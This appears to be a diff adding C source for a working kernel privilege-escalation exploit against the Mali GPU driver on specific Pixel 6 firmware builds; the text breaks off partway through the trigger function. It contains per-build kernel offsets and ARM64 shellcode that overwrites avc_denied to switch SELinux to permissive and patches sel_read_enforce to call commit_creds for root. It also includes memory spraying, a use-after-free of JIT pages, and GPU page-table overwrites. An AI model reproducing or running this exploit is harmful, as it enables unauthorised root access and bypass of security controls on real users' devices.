+#define ADD_COMMIT_2207 0x910a7108 //add x8, x8, #0x29c
+
+#define AVC_DENY_2211 0x8d6810
+
+#define SEL_READ_ENFORCE_2211 0x8ea124
+
+#define INIT_CRED_2211 0x2fd1388
+
+#define COMMIT_CREDS_2211 0x17ada4
+
+#define ADD_INIT_2211 0x910e2000 //add x0, x0, #0x388
+
+#define ADD_COMMIT_2211 0x91369108 //add x8, x8, #0xda4
+
+#define AVC_DENY_2212 0x8ba710
+
+#define SEL_READ_ENFORCE_2212 0x8cdfd4
+
+#define INIT_CRED_2212 0x2fd1418
+
+#define COMMIT_CREDS_2212 0x177ee4
+
+#define ADD_INIT_2212 0x91106000 //add x0, x0, #0x418
+
+#define ADD_COMMIT_2212 0x913b9108 //add x8, x8, #0xee4
+
+
+static uint64_t sel_read_enforce = SEL_READ_ENFORCE_2207;
+
+static uint64_t avc_deny = AVC_DENY_2207;
+
+/*
+Overwriting SELinux to permissive
+ strb wzr, [x0]
+ mov x0, #0
+ ret
+*/
+static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0};
+
+static uint32_t root_code[8] = {0};
+
+static uint8_t jit_id = 1;
+static uint8_t atom_number = 1;
+static uint64_t gpu_va[SPRAY_NUM] = {0};
+static int gpu_va_idx = 0;
+static void* flush_regions[FLUSH_REGION_SIZE];
+static void* alias_regions[SPRAY_NUM] = {0};
+static uint64_t reserved[TOTAL_RESERVED_SIZE/RESERVED_SIZE];
+
+
+struct base_mem_handle {
+ struct {
+ __u64 handle;
+ } basep;
+};
+
+struct base_mem_aliasing_info {
+ struct base_mem_handle handle;
+ __u64 offset;
+ __u64 length;
+};
+
+// Open a device node read-write; exits the process on failure.
+static int open_dev(char* name) {
+ int fd = open(name, O_RDWR);
+ if (fd == -1) {
+ err(1, "cannot open %s\n", name);
+ }
+ return fd;
+}
+
+// Perform the kbase driver handshake on fd: VERSION_CHECK, then SET_FLAGS
+// with the memory group id encoded in bits 3+ of the flags word.
+void setup_mali(int fd, int group_id) {
+ struct kbase_ioctl_version_check param = {0};
+ if (ioctl(fd, KBASE_IOCTL_VERSION_CHECK, &param) < 0) {
+ err(1, "version check failed\n");
+ }
+ struct kbase_ioctl_set_flags set_flags = {group_id << 3};
+ if (ioctl(fd, KBASE_IOCTL_SET_FLAGS, &set_flags) < 0) {
+ err(1, "set flags failed\n");
+ }
+}
+
+// Map the kbase "tracking page" (special handle BASE_MEM_MAP_TRACKING_HANDLE,
+// PROT_NONE) which the driver requires before other mappings can be made.
+void* setup_tracking_page(int fd) {
+ void* region = mmap(NULL, 0x1000, 0, MAP_SHARED, fd, BASE_MEM_MAP_TRACKING_HANDLE);
+ if (region == MAP_FAILED) {
+ err(1, "setup tracking page failed");
+ }
+ return region;
+}
+
+// Initialize the per-context JIT allocator: reserve va_pages of GPU VA,
+// allow up to 255 JIT allocations, with the given trim level and group.
+void jit_init(int fd, uint64_t va_pages, uint64_t trim_level, int group_id) {
+ struct kbase_ioctl_mem_jit_init init = {0};
+ init.va_pages = va_pages;
+ init.max_allocations = 255;
+ init.trim_level = trim_level;
+ init.group_id = group_id;
+ init.phys_pages = va_pages;
+
+ if (ioctl(fd, KBASE_IOCTL_MEM_JIT_INIT, &init) < 0) {
+ err(1, "jit init failed\n");
+ }
+}
+
+// Submit a BASE_JD_REQ_SOFT_JIT_ALLOC soft job allocating va_pages of JIT
+// memory under `id`; the driver writes the resulting GPU VA to
+// gpu_alloc_addr, which is read back and returned.
+// NOTE(review): the result is read immediately after KBASE_IOCTL_JOB_SUBMIT
+// returns, i.e. this relies on the soft job completing synchronously --
+// confirm against the targeted driver version.
+uint64_t jit_allocate(int fd, uint8_t atom_number, uint8_t id, uint64_t va_pages, uint64_t gpu_alloc_addr) {
+ struct base_jit_alloc_info info = {0};
+ struct base_jd_atom_v2 atom = {0};
+
+ info.id = id;
+ info.gpu_alloc_addr = gpu_alloc_addr;
+ info.va_pages = va_pages;
+ info.commit_pages = va_pages;
+ info.extension = 0x1000;
+
+ atom.jc = (uint64_t)(&info);
+ atom.atom_number = atom_number;
+ atom.core_req = BASE_JD_REQ_SOFT_JIT_ALLOC;
+ atom.nr_extres = 1;
+ struct kbase_ioctl_job_submit submit = {0};
+ submit.addr = (uint64_t)(&atom);
+ submit.nr_atoms = 1;
+ submit.stride = sizeof(struct base_jd_atom_v2);
+ if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
+ err(1, "submit job failed\n");
+ }
+ return *((uint64_t*)gpu_alloc_addr);
+}
+
+// Submit a BASE_JD_REQ_SOFT_JIT_FREE soft job releasing the JIT region with
+// the given id (the id byte is passed via the atom's jc pointer).
+void jit_free(int fd, uint8_t atom_number, uint8_t id) {
+ uint8_t free_id = id;
+
+ struct base_jd_atom_v2 atom = {0};
+
+ atom.jc = (uint64_t)(&free_id);
+ atom.atom_number = atom_number;
+ atom.core_req = BASE_JD_REQ_SOFT_JIT_FREE;
+ atom.nr_extres = 1;
+ struct kbase_ioctl_job_submit submit = {0};
+ submit.addr = (uint64_t)(&atom);
+ submit.nr_atoms = 1;
+ submit.stride = sizeof(struct base_jd_atom_v2);
+ if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
+ err(1, "submit job failed\n");
+ }
+
+}
+
+// Flip the given flag bits on a GPU region (mask == flags, so exactly those
+// bits are set). With ignore_results, failures are silently dropped.
+void mem_flags_change(int fd, uint64_t gpu_addr, uint32_t flags, int ignore_results) {
+ struct kbase_ioctl_mem_flags_change change = {0};
+ change.flags = flags;
+ change.gpu_va = gpu_addr;
+ change.mask = flags;
+ if (ignore_results) {
+ ioctl(fd, KBASE_IOCTL_MEM_FLAGS_CHANGE, &change);
+ return;
+ }
+ if (ioctl(fd, KBASE_IOCTL_MEM_FLAGS_CHANGE, &change) < 0) {
+ err(1, "flags_change failed\n");
+ }
+}
+
+// Thin checked wrapper around KBASE_IOCTL_MEM_ALLOC; exits on failure.
+void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc) {
+ if (ioctl(fd, KBASE_IOCTL_MEM_ALLOC, alloc) < 0) {
+ err(1, "mem_alloc failed\n");
+ }
+}
+
+// Thin checked wrapper around KBASE_IOCTL_MEM_ALIAS; exits on failure.
+void mem_alias(int fd, union kbase_ioctl_mem_alias* alias) {
+ if (ioctl(fd, KBASE_IOCTL_MEM_ALIAS, alias) < 0) {
+ err(1, "mem_alias failed\n");
+ }
+}
+
+// Thin checked wrapper around KBASE_IOCTL_MEM_QUERY; exits on failure.
+void mem_query(int fd, union kbase_ioctl_mem_query* query) {
+ if (ioctl(fd, KBASE_IOCTL_MEM_QUERY, query) < 0) {
+ err(1, "mem_query failed\n");
+ }
+}
+
+// Resize the physical backing of the region at gpu_addr to `pages` pages
+// via KBASE_IOCTL_MEM_COMMIT; exits on failure.
+// Fix: the initializer previously read `{.gpu_addr = gpu_addr, pages = pages}`
+// -- a designator followed by a positional self-assignment expression. It
+// only initialized the right member because `pages` happens to follow
+// `gpu_addr` in the struct, and the self-assignment draws compiler warnings.
+// Use an explicit designator instead.
+void mem_commit(int fd, uint64_t gpu_addr, uint64_t pages) {
+ struct kbase_ioctl_mem_commit commit = {.gpu_addr = gpu_addr, .pages = pages};
+ if (ioctl(fd, KBASE_IOCTL_MEM_COMMIT, &commit) < 0) {
+ err(1, "mem_commit failed\n");
+ }
+}
+
+// Allocate a GPU region of va_pages (commit_pages backed) in the given
+// memory group and mmap it into the CPU; GPU/CPU write access is granted
+// unless read_only. Exits on failure; returns the CPU mapping.
+void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group) {
+ union kbase_ioctl_mem_alloc alloc = {0};
+ alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (group << 22);
+ int prot = PROT_READ;
+ if (!read_only) {
+ alloc.in.flags |= BASE_MEM_PROT_GPU_WR;
+ prot |= PROT_WRITE;
+ }
+ alloc.in.va_pages = va_pages;
+ alloc.in.commit_pages = commit_pages;
+ mem_alloc(mali_fd, &alloc);
+ void* region = mmap(NULL, 0x1000 * va_pages, prot, MAP_SHARED, mali_fd, alloc.out.gpu_va);
+ if (region == MAP_FAILED) {
+ err(1, "mmap failed");
+ }
+ return region;
+}
+
+// Allocate a fully-committed GPU region of `pages` pages (CPU/GPU RW flags)
+// and return its GPU VA without mapping it.
+// NOTE(review): the local `prot` is unused here.
+uint64_t alloc_mem(int mali_fd, unsigned int pages) {
+ union kbase_ioctl_mem_alloc alloc = {0};
+ alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR;
+ int prot = PROT_READ | PROT_WRITE;
+ alloc.in.va_pages = pages;
+ alloc.in.commit_pages = pages;
+ mem_alloc(mali_fd, &alloc);
+ return alloc.out.gpu_va;
+}
+
+// Free the GPU region at gpuaddr via KBASE_IOCTL_MEM_FREE; exits on failure.
+void free_mem(int mali_fd, uint64_t gpuaddr) {
+ struct kbase_ioctl_mem_free mem_free = {.gpu_addr = gpuaddr};
+ if (ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free) < 0) {
+ err(1, "free_mem failed\n");
+ }
+}
+
+// Allocate POOL_SIZE committed pages from memory group 1 (flags bit 22) in
+// one go, presumably to empty that group's page pool -- see release_mem_pool.
+// NOTE(review): the local `prot` is unused here.
+uint64_t drain_mem_pool(int mali_fd) {
+ union kbase_ioctl_mem_alloc alloc = {0};
+ alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22);
+ int prot = PROT_READ | PROT_WRITE;
+ alloc.in.va_pages = POOL_SIZE;
+ alloc.in.commit_pages = POOL_SIZE;
+ mem_alloc(mali_fd, &alloc);
+ return alloc.out.gpu_va;
+}
+
+// Free the region allocated by drain_mem_pool, returning its pages to the
+// driver. Same body as free_mem; kept separate for readability of the flow.
+void release_mem_pool(int mali_fd, uint64_t drain) {
+ struct kbase_ioctl_mem_free mem_free = {.gpu_addr = drain};
+ if (ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free) < 0) {
+ err(1, "free_mem failed\n");
+ }
+}
+
+#define CPU_SETSIZE 1024
+#define __NCPUBITS (8 * sizeof (unsigned long))
+typedef struct
+{
+ unsigned long __bits[CPU_SETSIZE / __NCPUBITS];
+} cpu_set_t;
+
+#define CPU_SET(cpu, cpusetp) \
+ ((cpusetp)->__bits[(cpu)/__NCPUBITS] |= (1UL << ((cpu) % __NCPUBITS)))
+#define CPU_ZERO(cpusetp) \
+ memset((cpusetp), 0, sizeof(cpu_set_t))
+
+// Pin the calling thread to CPU i using the raw sched_setaffinity syscall
+// (avoids libc's cpu_set_t; the local definitions above mirror it).
+// Returns 0 on success, -1 on failure.
+int migrate_to_cpu(int i)
+{
+ int syscallres;
+ pid_t pid = gettid();
+ cpu_set_t cpu;
+ CPU_ZERO(&cpu);
+ CPU_SET(i, &cpu);
+
+ syscallres = syscall(__NR_sched_setaffinity, pid, sizeof(cpu), &cpu);
+ if (syscallres)
+ {
+ return -1;
+ }
+ return 0;
+}
+
+// Pin to spray_cpu, then map and dirty a FLUSH_SIZE anonymous region --
+// presumably to create memory pressure / evict caches between trials
+// (regions are kept in flush_regions and munmapped later). TODO confirm.
+void* flush(int spray_cpu, int idx) {
+ migrate_to_cpu(spray_cpu);
+ void* region = mmap(NULL, FLUSH_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
+ if (region == MAP_FAILED) err(1, "flush failed");
+ memset(region, idx, FLUSH_SIZE);
+ return region;
+}
+
+// Allocate nents committed regions of `pages` pages each from memory group 1
+// (flags bit 22), storing their GPU VAs in reserved_va.
+// NOTE(review): the local `prot` is unused here.
+void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va) {
+ for (int i = 0; i < nents; i++) {
+ union kbase_ioctl_mem_alloc alloc = {0};
+ alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22);
+ int prot = PROT_READ | PROT_WRITE;
+ alloc.in.va_pages = pages;
+ alloc.in.commit_pages = pages;
+ mem_alloc(mali_fd, &alloc);
+ reserved_va[i] = alloc.out.gpu_va;
+ }
+}
+
+// mmap each region reserved by reserve_pages into the CPU, replacing the
+// stored GPU VA in reserved_va[i] with the CPU mapping address (callers use
+// these addresses as GPU VAs afterwards -- on kbase the mmap address doubles
+// as the region's GPU VA).
+void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va) {
+ for (int i = 0; i < nents; i++) {
+ void* reserved = mmap(NULL, 0x1000 * pages, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, reserved_va[i]);
+ if (reserved == MAP_FAILED) {
+ err(1, "mmap reserved failed");
+ }
+ reserved_va[i] = (uint64_t)reserved;
+ }
+}
+
+// Create one big alias region covering all SPRAY_NUM sprayed regions
+// (stride SPRAY_PAGES each) via KBASE_IOCTL_MEM_ALIAS, then map the alias
+// read-only: alias_regions[0] is the full mapping, alias_regions[1..] are
+// per-source-region sub-mappings. Returns the base CPU address of the alias.
+// The aliases let us read the sprayed regions' backing pages even after
+// those pages are freed underneath them.
+uint64_t alias_sprayed_regions(int mali_fd) {
+ union kbase_ioctl_mem_alias alias = {0};
+ alias.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR;
+ alias.in.stride = SPRAY_PAGES;
+
+ alias.in.nents = SPRAY_NUM;
+ struct base_mem_aliasing_info ai[SPRAY_NUM];
+ for (int i = 0; i < SPRAY_NUM; i++) {
+ ai[i].handle.basep.handle = gpu_va[i];
+ ai[i].length = SPRAY_PAGES;
+ ai[i].offset = 0;
+ }
+ alias.in.aliasing_info = (uint64_t)(&(ai[0]));
+ mem_alias(mali_fd, &alias);
+ uint64_t region_size = 0x1000 * SPRAY_NUM * SPRAY_PAGES;
+ void* region = mmap(NULL, region_size, PROT_READ, MAP_SHARED, mali_fd, alias.out.gpu_va);
+ if (region == MAP_FAILED) {
+ err(1, "mmap alias failed");
+ }
+ alias_regions[0] = region;
+ for (int i = 1; i < SPRAY_NUM; i++) {
+ void* this_region = mmap(NULL, 0x1000 * SPRAY_PAGES, PROT_READ, MAP_SHARED, mali_fd, (uint64_t)region + i * 0x1000 * SPRAY_PAGES);
+ if (this_region == MAP_FAILED) {
+ err(1, "mmap alias failed %d\n", i);
+ }
+ alias_regions[i] = this_region;
+ }
+ return (uint64_t)region;
+}
+
+// Touch the first byte of every sprayed region (write) and of every alias
+// (read) so backing pages actually get faulted in/attached; the summed reads
+// are logged only to keep the loads from being optimized away.
+// NOTE(review): local `read` shadows read(2) -- harmless here but confusing.
+void fault_pages() {
+ int read = 0;
+ for (int va = 0; va < SPRAY_NUM; va++) {
+ uint8_t* this_va = (uint8_t*)(gpu_va[va]);
+ *this_va = 0;
+ uint8_t* this_alias = alias_regions[va];
+ read += *this_alias;
+ }
+ LOG("read %d\n", read);
+}
+
+// Scan the sprayed regions and return the index of the one whose commit size
+// no longer equals SPRAY_PAGES -- i.e. the region whose backing pages were
+// taken away -- or -1 if none is found.
+int find_freed_idx(int mali_fd) {
+ int freed_idx = -1;
+ for (int j = 0; j < SPRAY_NUM; j++) {
+ union kbase_ioctl_mem_query query = {0};
+ query.in.gpu_addr = gpu_va[j];
+ query.in.query = KBASE_MEM_QUERY_COMMIT_SIZE;
+ ioctl(mali_fd, KBASE_IOCTL_MEM_QUERY, &query);
+ if (query.out.value != SPRAY_PAGES) {
+ LOG("jit_free commit: %d %llu\n", j, query.out.value);
+ freed_idx = j;
+ }
+ }
+ return freed_idx;
+}
+
+// Look through the freed region's alias mapping for a page that now holds a
+// GPU page table: an 8-byte entry with the 0x443 bit pattern set (valid PTE
+// flag bits used elsewhere in this exploit). Returns the page index within
+// the alias, or -1 if not found.
+int find_pgd(int freed_idx, int start_pg) {
+ uint64_t* this_alias = alias_regions[freed_idx];
+ for (int pg = start_pg; pg < SPRAY_PAGES; pg++) {
+ for (int i = 0; i < 0x1000/8; i++) {
+ uint64_t entry = this_alias[pg * 0x1000/8 + i];
+ if ((entry & 0x443) == 0x443) {
+ return pg;
+ }
+ }
+ }
+ return -1;
+}
+
+// Low 32 bits of a 64-bit value.
+uint32_t lo32(uint64_t x) {
+ return x & 0xffffffff;
+}
+
+// High 32 bits of a 64-bit value.
+uint32_t hi32(uint64_t x) {
+ return x >> 32;
+}
+
+// Encode an AArch64 ADRP instruction: at address `pc`, load the page of
+// `label` into register rd. The +/-4GiB page offset is split into immlo
+// (bits 29-30) and immhi (bits 5-23) per the A64 encoding.
+uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) {
+ uint64_t pc_page = pc >> 12;
+ uint64_t label_page = label >> 12;
+ int64_t offset = (label_page - pc_page) << 12;
+ int64_t immhi_mask = 0xffffe0;
+ int64_t immhi = offset >> 14;
+ int32_t immlo = (offset >> 12) & 0x3;
+ uint32_t adpr = rd & 0x1f;
+ adpr |= (1 << 28);
+ adpr |= (1 << 31); //op
+ adpr |= immlo << 29;
+ adpr |= (immhi_mask & (immhi << 5));
+ return adpr;
+}
+
+// Assemble the 8-instruction root payload into root_code. It will be placed
+// at sel_read_enforce, so the ADRP instructions are encoded relative to
+// read_enforce: x0 = &init_cred, x8 = commit_creds, then call
+// commit_creds(init_cred) and return. The ADD immediates (add_init,
+// add_commit) are pre-encoded per-firmware constants.
+void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit) {
+
+ uint32_t init_adpr = write_adrp(0, read_enforce, init_cred);
+ //Sets x0 to init_cred
+ root_code[ADRP_INIT_INDEX] = init_adpr;
+ root_code[ADD_INIT_INDEX] = add_init;
+ //Sets x8 to commit_creds
+ root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_enforce, commit_cred);
+ root_code[ADD_COMMIT_INDEX] = add_commit;
+ root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10]
+ root_code[5] = 0xd63f0100; // blr x8
+ root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10
+ root_code[7] = 0xd65f03c0; // ret
+}
+
+// Round addr down to a 512-page (level-3 table) boundary and select the page
+// whose level-3 index is 0x100 -- matching OVERWRITE_INDEX (256), the PGD
+// slot this exploit overwrites.
+uint64_t set_addr_lv3(uint64_t addr) {
+ uint64_t pfn = addr >> PAGE_SHIFT;
+ pfn &= ~ 0x1FFUL;
+ pfn |= 0x100UL;
+ return pfn << PAGE_SHIFT;
+}
+
+// Page-table index of addr at the given level (9 bits per level, level 3
+// being the leaf level).
+static inline uint64_t compute_pt_index(uint64_t addr, int level) {
+ uint64_t vpfn = addr >> PAGE_SHIFT;
+ vpfn >>= (3 - level) * 9;
+ return vpfn & 0x1FF;
+}
+
+// Use the GPU itself as a write primitive: build a WRITE_VALUE job (header +
+// payload packed into a freshly mapped 1-page region) that stores `value` at
+// GPU VA gpu_addr, submit it, and sleep briefly to let it execute.
+// NOTE(review): completion is inferred from the 10ms usleep, not from an
+// event wait -- timing-dependent by design.
+void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, enum mali_write_value_type type) {
+ void* jc_region = map_gpu(mali_fd, 1, 1, false, 0);
+ struct MALI_JOB_HEADER jh = {0};
+ jh.is_64b = true;
+ jh.type = MALI_JOB_TYPE_WRITE_VALUE;
+
+ struct MALI_WRITE_VALUE_JOB_PAYLOAD payload = {0};
+ payload.type = type;
+ payload.immediate_value = value;
+ payload.address = gpu_addr;
+
+ MALI_JOB_HEADER_pack((uint32_t*)jc_region, &jh);
+ MALI_WRITE_VALUE_JOB_PAYLOAD_pack((uint32_t*)jc_region + 8, &payload);
+ uint32_t* section = (uint32_t*)jc_region;
+ struct base_jd_atom_v2 atom = {0};
+ atom.jc = (uint64_t)jc_region;
+ atom.atom_number = atom_number;
+ atom.core_req = BASE_JD_REQ_CS;
+ struct kbase_ioctl_job_submit submit = {0};
+ submit.addr = (uint64_t)(&atom);
+ submit.nr_atoms = 1;
+ submit.stride = sizeof(struct base_jd_atom_v2);
+ if (ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
+ err(1, "submit job failed\n");
+ }
+ usleep(10000);
+}
+
+// Copy `shellcode` (code_size 32-bit words) over the kernel function at
+// physical-offset `func`. The reserved regions have been remapped (via the
+// overwritten PGD entry) so that the page at set_addr_lv3(addr) aliases the
+// kernel page containing the function; each distinct aliased page is written
+// once. Words are written in reverse order -- presumably so the function's
+// first instruction only becomes live once the rest is in place (confirm).
+void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size) {
+ uint64_t func_offset = (func + KERNEL_BASE) % 0x1000;
+ uint64_t curr_overwrite_addr = 0;
+ for (int i = 0; i < size; i++) {
+ uint64_t base = reserved[i];
+ uint64_t end = reserved[i] + RESERVED_SIZE * 0x1000;
+ uint64_t start_idx = compute_pt_index(base, 3);
+ uint64_t end_idx = compute_pt_index(end, 3);
+ for (uint64_t addr = base; addr < end; addr += 0x1000) {
+ uint64_t overwrite_addr = set_addr_lv3(addr);
+ if (curr_overwrite_addr != overwrite_addr) {
+ LOG("overwrite addr : %lx %lx\n", overwrite_addr + func_offset, func_offset);
+ curr_overwrite_addr = overwrite_addr;
+ for (int code = code_size - 1; code >= 0; code--) {
+ write_to(mali_fd, overwrite_addr + func_offset + code * 4, shellcode[code], atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
+ }
+ usleep(300000);
+ }
+ }
+ }
+}
+
+// Read back the SELinux enforcing state after the overwrite settles.
+// Returns the ASCII character read from /sys/fs/selinux/enforce ('0' =
+// permissive), i.e. 48/49 as an int, not 0/1; '2' means the read failed.
+int run_enforce() {
+ char result = '2';
+ sleep(3);
+ int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY);
+ read(enforce_fd, &result, 1);
+ close(enforce_fd);
+ LOG("result %d\n", result);
+ return result;
+}
+
+// Pick per-firmware kernel offsets by matching the exact build fingerprint
+// (ro.build.fingerprint) against the supported Pixel 6 builds, and assemble
+// the root payload for that build; exits if the build is unsupported.
+// NOTE(review): `len` is unused, and `fingerprint` is only initialized if
+// the property exists -- the LOG line could print garbage on failure.
+void select_offset() {
+ char fingerprint[256];
+ int len = __system_property_get("ro.build.fingerprint", fingerprint);
+ LOG("fingerprint: %s\n", fingerprint);
+ if (!strcmp(fingerprint, "google/oriole/oriole:12/SD1A.210817.037/7862242:user/release-keys")) {
+ avc_deny = AVC_DENY_2108;
+ sel_read_enforce = SEL_READ_ENFORCE_2108;
+ fixup_root_shell(INIT_CRED_2108, COMMIT_CREDS_2108, SEL_READ_ENFORCE_2108, ADD_INIT_2108, ADD_COMMIT_2108);
+ return;
+ }
+ if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220105.007/8030436:user/release-keys")) {
+ avc_deny = AVC_DENY_2201;
+ sel_read_enforce = SEL_READ_ENFORCE_2201;
+ fixup_root_shell(INIT_CRED_2201, COMMIT_CREDS_2201, SEL_READ_ENFORCE_2201, ADD_INIT_2201, ADD_COMMIT_2201);
+ return;
+ }
+ if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220205.004/8151327:user/release-keys")) {
+ avc_deny = AVC_DENY_2202;
+ sel_read_enforce = SEL_READ_ENFORCE_2202;
+ fixup_root_shell(INIT_CRED_2202, COMMIT_CREDS_2202, SEL_READ_ENFORCE_2202, ADD_INIT_2202, ADD_COMMIT_2202);
+ return;
+ }
+ if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ3A.220705.003/8671607:user/release-keys")) {
+ avc_deny = AVC_DENY_2207;
+ sel_read_enforce = SEL_READ_ENFORCE_2207;
+ fixup_root_shell(INIT_CRED_2207, COMMIT_CREDS_2207, SEL_READ_ENFORCE_2207, ADD_INIT_2207, ADD_COMMIT_2207);
+ return;
+ }
+ if (!strcmp(fingerprint, "google/oriole/oriole:13/TP1A.221105.002/9080065:user/release-keys")) {
+ avc_deny = AVC_DENY_2211;
+ sel_read_enforce = SEL_READ_ENFORCE_2211;
+ fixup_root_shell(INIT_CRED_2211, COMMIT_CREDS_2211, SEL_READ_ENFORCE_2211, ADD_INIT_2211, ADD_COMMIT_2211);
+ return;
+ }
+ if (!strcmp(fingerprint, "google/oriole/oriole:13/TQ1A.221205.011/9244662:user/release-keys")) {
+ avc_deny = AVC_DENY_2212;
+ sel_read_enforce = SEL_READ_ENFORCE_2212;
+ fixup_root_shell(INIT_CRED_2212, COMMIT_CREDS_2212, SEL_READ_ENFORCE_2212, ADD_INIT_2212, ADD_COMMIT_2212);
+ return;
+ }
+
+ err(1, "unable to match build id\n");
+}
+
+// Restore the overwritten PGD slot to the value 2 (an invalid/ATE-free
+// entry), detaching our kernel-page alias.
+void cleanup(int mali_fd, uint64_t pgd) {
+ write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), 2, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+}
+
+// With control of a GPU PGD page (`pgd`): point its OVERWRITE_INDEX entry at
+// the kernel page holding avc_deny (PTE flags 0x443), patch avc_deny with
+// the 'permissive' stub via write_func, trigger it with an open() that hits
+// SELinux, then repeat for sel_read_enforce with the commit_creds payload.
+void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) {
+ uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
+ write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+
+ usleep(100000);
+ //Go through the reserve pages addresses to write to avc_denied with our own shellcode
+ write_func(mali_fd2, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t));
+
+ //Triggers avc_denied to disable SELinux
+ open("/dev/kmsg", O_RDONLY);
+
+ uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
+ write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+
+ //Call commit_creds to overwrite process credentials to gain root
+ write_func(mali_fd2, sel_read_enforce, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));
+}
+
+// Spray SPRAY_NUM uncommitted SPRAY_PAGES-sized regions (group 1) to reclaim
+// the freed JIT pages, then map each; mappings land in gpu_va[0..63].
+// Done in two batches of 32 because the driver exposes a limited number of
+// outstanding mmap cookies -- the 32-entry cookies array is reused.
+void spray(int mali_fd) {
+ uint64_t cookies[32] = {0};
+ for (int j = 0; j < 32; j++) {
+ union kbase_ioctl_mem_alloc alloc = {0};
+ alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (1 << 22);
+ alloc.in.va_pages = SPRAY_PAGES;
+ alloc.in.commit_pages = 0;
+ mem_alloc(mali_fd, &alloc);
+ cookies[j] = alloc.out.gpu_va;
+ }
+ for (int j = 0; j < 32; j++) {
+ void* region = mmap(NULL, 0x1000 * SPRAY_PAGES, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, cookies[j]);
+ if (region == MAP_FAILED) {
+ err(1, "mmap failed");
+ }
+ gpu_va[j] = (uint64_t)region;
+ }
+ for (int j = 32; j < 64; j++) {
+ union kbase_ioctl_mem_alloc alloc = {0};
+ alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (1 << 22);
+ alloc.in.va_pages = SPRAY_PAGES;
+ alloc.in.commit_pages = 0;
+ mem_alloc(mali_fd, &alloc);
+ cookies[j - 32] = alloc.out.gpu_va;
+ }
+ for (int j = 32; j < 64; j++) {
+ void* region = mmap(NULL, 0x1000 * SPRAY_PAGES, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, cookies[j - 32]);
+ if (region == MAP_FAILED) {
+ err(1, "mmap failed");
+ }
+ gpu_va[j] = (uint64_t)region;
+ }
+}
+
+// One attempt at the race/UAF, returning 0 on success and -1 to retry:
+// 1. JIT-allocate a region and mark it BASE_MEM_DONT_NEED so the memory
+//    shrinker may reclaim it.
+// 2. Repeatedly create memory pressure (flush) while MEM_QUERYing the JIT
+//    region; the ioctl failing means the shrinker evicted it.
+// 3. Spray regions + commits to reclaim the evicted backing pages, alias
+//    and fault them so we keep readable views of those pages.
+// 4. Drain/release the group-1 pool, then jit_free -- the JIT pages (now
+//    shared with our sprayed regions) go back to the driver (the UAF).
+// 5. map_reserved on the second fd reuses the freed pages as GPU page
+//    tables; find_freed_idx/find_pgd locate a PGD visible through our
+//    alias, and write_shellcode/run_enforce/cleanup finish the job.
+int trigger(int mali_fd, int mali_fd2, int* flush_idx) {
+ if (*flush_idx + NUM_TRIALS > FLUSH_REGION_SIZE) {
+ err(1, "Out of memory.");
+ }
+ void* gpu_alloc_addr = map_gpu(mali_fd, 1, 1, false, 0);
+
